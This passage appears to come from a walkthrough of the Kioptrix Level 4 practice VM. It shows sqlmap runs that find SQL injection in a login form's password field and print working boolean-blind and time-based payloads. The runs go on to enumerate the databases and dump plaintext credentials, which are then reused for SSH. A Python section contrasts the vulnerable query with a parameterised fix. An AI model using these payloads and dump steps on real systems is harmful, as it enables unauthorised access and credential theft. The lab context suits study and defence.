    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

    3.1.2 Enumerating the databases

    └─# sqlmap -r sql.txt --batch --level 3 --dbs
     ___ ___[']_____ ___ ___  {1.8.3#stable}
    |_ -| . [)]     | .'| . |
    |___|_  [.]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:35:59 /2024-06-12/
    [09:35:59] [INFO] parsing HTTP request from 'sql.txt'
    [09:36:00] [INFO] testing connection to the target URL
    [09:36:00] [INFO] testing if the target URL content is stable
    [09:36:00] [INFO] target URL content is stable
    [09:36:00] [INFO] testing if POST parameter 'myusername' is dynamic
    [09:36:00] [WARNING] POST parameter 'myusername' does not appear to be dynamic
    [09:36:00] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
    [09:36:00] [INFO] testing for SQL injection on POST parameter 'myusername'
    [09:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
    [09:36:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [09:36:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [09:36:01] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
    [09:36:01] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
    [09:36:02] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Informix boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
    [09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [09:36:02] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
    [09:36:02] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
    [09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
    [09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
    [09:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [09:36:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [09:36:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
    [09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
    [09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
    [09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
    [09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
    [09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
    [09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
    [09:36:04] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
    [09:36:04] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
    [09:36:05] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
    [09:36:05] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
    [09:36:05] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [09:36:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [09:36:05] [INFO] testing 'PostgreSQL error-based - Parameter replace'
    [09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
    [09:36:05] [INFO] testing 'Oracle error-based - Parameter replace'
    [09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
    [09:36:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [09:36:05] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
    [09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
    [09:36:05] [INFO] testing 'Generic inline queries'
    [09:36:05] [INFO] testing 'MySQL inline queries'
    [09:36:05] [INFO] testing 'PostgreSQL inline queries'
    [09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
    [09:36:05] [INFO] testing 'Oracle inline queries'
    [09:36:05] [INFO] testing 'SQLite inline queries'
    [09:36:06] [INFO] testing 'Firebird inline queries'
    [09:36:06] [INFO] testing 'ClickHouse inline queries'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
    [09:36:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
    [09:36:06] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
    [09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
    [09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
    [09:36:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
    [09:36:07] [INFO] testing 'MySQL AND time-based blind (ELT)'
    [09:36:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
    [09:36:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
    [09:36:08] [INFO] testing 'Oracle AND time-based blind'
    [09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
    [09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
    [09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
    [09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
    [09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
    [09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
    [09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
    [09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
    [09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
    it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
    [09:36:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [09:36:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
    [09:36:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
    [09:36:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
    [09:36:10] [WARNING] POST parameter 'myusername' does not seem to be injectable
    [09:36:10] [INFO] testing if POST parameter 'mypassword' is dynamic
    [09:36:10] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
    [09:36:10] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
    [09:36:10] [INFO] testing for SQL injection on POST parameter 'mypassword'
    it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
    [09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
    [09:36:10] [INFO] POST parameter 'mypassword' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="28")
    [09:36:10] [INFO] testing 'Generic inline queries'
    [09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    got a 302 redirect to ''. Do you want to follow? [Y/n] Y
    redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
    [09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [09:36:10] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
    [09:36:10] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
    [09:36:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [09:36:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [09:36:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:10] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [09:36:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [09:36:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [09:36:11] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
    [09:36:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [09:36:11] [INFO] testing 'MySQL inline queries'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
    [09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
    [09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [09:36:21] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
    [09:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [09:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [09:36:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [09:36:21] [INFO] target URL appears to have 3 columns in query
    do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [09:36:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
    [09:36:22] [INFO] target URL appears to be UNION injectable with 3 columns
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [09:36:23] [INFO] testing 'Generic UNION query (59) - 21 to 40 columns'
    [09:36:23] [INFO] testing 'Generic UNION query (59) - 41 to 60 columns'
    [09:36:23] [INFO] testing 'MySQL UNION query (59) - 1 to 20 columns'
    [09:36:24] [INFO] testing 'MySQL UNION query (59) - 21 to 40 columns'
    [09:36:24] [INFO] testing 'MySQL UNION query (59) - 41 to 60 columns'
    [09:36:24] [INFO] testing 'MySQL UNION query (59) - 61 to 80 columns'
    [09:36:25] [INFO] testing 'MySQL UNION query (59) - 81 to 100 columns'
    [09:36:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
    POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 1473 HTTP(s) requests:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:36:25] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP, Apache 2.2.8, PHP 5.2.4
    back-end DBMS: MySQL >= 5.0.12
    [09:36:25] [INFO] fetching database names
    [09:36:25] [INFO] fetching number of databases
    [09:36:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:36:25] [INFO] retrieved: 3
    [09:36:25] [INFO] retrieved: information_schema
    [09:36:26] [INFO] retrieved: members
    [09:36:26] [INFO] retrieved: mysql
    available databases [3]:
    [*] information_schema
    [*] members
    [*] mysql
    [09:36:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:36:27 /2024-06-12/


    • information_schema
    • members
    • mysql

    3.1.3 The currently connected database

    └─# sqlmap -r sql.txt --batch --level 3 --current-db 
     ___ ___[.]_____ ___ ___  {1.8.3#stable}
    |_ -| . ["]     | .'| . |
    |___|_  [']_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:42:14 /2024-06-12/
    [09:42:14] [INFO] parsing HTTP request from 'sql.txt'
    [09:42:15] [INFO] resuming back-end DBMS 'mysql' 
    [09:42:15] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:42:15] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8
    back-end DBMS: MySQL >= 5.0.12
    [09:42:15] [INFO] fetching current database
    [09:42:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:42:15] [INFO] retrieved: members
    current database: 'members'
    [09:42:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:42:15 /2024-06-12/


    • members

    3.1.4 Table names in the connected database

    └─# sqlmap -r sql.txt --batch --level 3 -D members --tables
     ___ ___[']_____ ___ ___  {1.8.3#stable}
    |_ -| . ["]     | .'| . |
    |___|_  ["]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:45:10 /2024-06-12/
    [09:45:10] [INFO] parsing HTTP request from 'sql.txt'
    [09:45:10] [INFO] resuming back-end DBMS 'mysql' 
    [09:45:10] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:45:11] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: Apache 2.2.8, PHP 5.2.4
    back-end DBMS: MySQL >= 5.0.12
    [09:45:11] [INFO] fetching tables for database: 'members'
    [09:45:11] [INFO] fetching number of tables for database 'members'
    [09:45:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:45:11] [INFO] retrieved: 1
    [09:45:11] [INFO] retrieved: members
    Database: members
    [1 table]
    | members |
    [09:45:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:45:11 /2024-06-12/


    3.1.5 Column names

    └─# sqlmap -r sql.txt --batch --level 3 -D members -T members --columns
     ___ ___[.]_____ ___ ___  {1.8.3#stable}
    |_ -| . [(]     | .'| . |
    |___|_  ["]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:48:22 /2024-06-12/
    [09:48:22] [INFO] parsing HTTP request from 'sql.txt'
    [09:48:22] [INFO] resuming back-end DBMS 'mysql' 
    [09:48:22] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:48:22] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8
    back-end DBMS: MySQL >= 5.0.12
    [09:48:22] [INFO] fetching columns for table 'members' in database 'members'
    [09:48:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:48:22] [INFO] retrieved: 3
    [09:48:22] [INFO] retrieved: id
    [09:48:23] [INFO] retrieved: int(4)
    [09:48:23] [INFO] retrieved: username
    [09:48:23] [INFO] retrieved: varchar(65)
    [09:48:24] [INFO] retrieved: password
    [09:48:24] [INFO] retrieved: varchar(65)
    Database: members
    Table: members
    [3 columns]
    | Column   | Type        |
    | id       | int(4)      |
    | password | varchar(65) |
    | username | varchar(65) |
    [09:48:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:48:25 /2024-06-12/


    • id
    • password
    • username

    3.1.6 Usernames and passwords

    └─# sqlmap -r sql.txt --batch --level 3 -D members -T members -C id,username,password --dump
     ___ ___[(]_____ ___ ___  {1.8.3#stable}
    |_ -| . [)]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:52:26 /2024-06-12/
    [09:52:26] [INFO] parsing HTTP request from 'sql.txt'
    [09:52:26] [INFO] resuming back-end DBMS 'mysql' 
    [09:52:26] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:52:26] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: Apache 2.2.8, PHP 5.2.4
    back-end DBMS: MySQL >= 5.0.12
    [09:52:26] [INFO] fetching entries of column(s) 'id,password,username' for table 'members' in database 'members'
    [09:52:26] [INFO] fetching number of column(s) 'id,password,username' entries for table 'members' in database 'members'
    [09:52:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:52:26] [INFO] retrieved: 2
    [09:52:26] [INFO] retrieved: 1
    [09:52:26] [INFO] retrieved: MyNameIsJohn
    [09:52:27] [INFO] retrieved: john
    [09:52:27] [INFO] retrieved: 2
    [09:52:27] [INFO] retrieved: ADGAds
    [09:52:28] [INFO] retrieved: 
    [09:52:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                        
    do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
    [09:52:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
    [09:52:43] [INFO] adjusting time delay to 1 second due to good response times
    Database: members
    Table: members
    [2 entries]
    | id | username | password     |
    | 1  | john     | MyNameIsJohn |
    | 2  | robert   | ADGAds       |
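
    The whole sqlmap chain above (3.1.2 to 3.1.6) works because checklogin.php splices the mypassword field straight into its SQL statement. The following is an added example, not code from the Kioptrix VM or from this writeup: a Python/SQLite model of that login query, showing the concatenating version that sqlmap's boolean-blind payloads drive beside the parameterised fix. It assumes checklogin.php builds its WHERE clause by string concatenation (the page never shows the PHP source) and uses a simplified true/false condition in place of the page's CASE/UNION payload, since SQLite does not raise an error on a multi-row scalar subquery the way MySQL does.

```python
"""
Model of the Kioptrix Level 4 login query (assumed shape of checklogin.php):
the vulnerable concatenation beside a parameterised query.  Added example;
runs offline against an in-memory SQLite copy of the 'members' table.
"""
import sqlite3

# Constructed sample data mirroring the members.members table that sqlmap
# dumped (id int, username varchar, password varchar; plaintext, as on the VM).
SAMPLE_ROWS = [
    (1, "john", "MyNameIsJohn"),
    (2, "robert", "ADGAds"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the 'members' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_login(conn, username: str, password: str):
    """Builds the WHERE clause by string formatting (assumption about what
    checklogin.php does).  Whatever the client sends in mypassword becomes
    part of the SQL text, so quotes and comments are parsed as SQL."""
    sql = ("SELECT id, username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone()


def safe_login(conn, username: str, password: str):
    """Same query with bound parameters: values travel separately from the
    statement and are only ever compared as data."""
    sql = "SELECT id, username FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


# Simplified boolean-blind oracle: the same bogus password with an injected
# condition that is true versus false produces two different responses.
# The '--' comment swallows the closing quote the query would otherwise add.
PAYLOAD_TRUE = "x' OR 1=1-- -"
PAYLOAD_FALSE = "x' OR 1=2-- -"


def compare() -> dict:
    """Run both implementations against legitimate and injected input."""
    conn = make_db()
    return {
        "legit_vuln": vulnerable_login(conn, "john", "MyNameIsJohn"),
        "legit_safe": safe_login(conn, "john", "MyNameIsJohn"),
        "injected_true_vuln": vulnerable_login(conn, "admin", PAYLOAD_TRUE),
        "injected_false_vuln": vulnerable_login(conn, "admin", PAYLOAD_FALSE),
        "injected_true_safe": safe_login(conn, "admin", PAYLOAD_TRUE),
    }


if __name__ == "__main__":
    for name, row in compare().items():
        print(f"{name:22s} -> {row}")
```

    The vulnerable function answers differently to the true and false payloads even though "admin" is not a user, which is exactly the signal sqlmap's boolean-blind technique turns into one-character-at-a-time data retrieval; the parameterised function returns nothing for either. Two further points the dump makes visible: the table stores passwords in plaintext, and the same password then opens an SSH account, so hashing stored credentials and not reusing them across services would have contained the damage even after the injection.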



    3.2 Shell escape

    3.2.1 SSH login

    Xshell 7 (Build 0063)
    Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.
    Type `help' to learn how to use Xshell prompt.
    [C:\~]$ ssh john@
    Connecting to
    Connection established.
    To escape to local shell, press 'Ctrl+Alt+]'.
    WARNING! The remote SSH server rejected X11 forwarding request.
    Welcome to LigGoat Security Systems - We are Watching
    == Welcome LigGoat Employee ==
    LigGoat Shell is in place so you  don't screw up
    Type '?' or 'help' to get the list of allowed commands


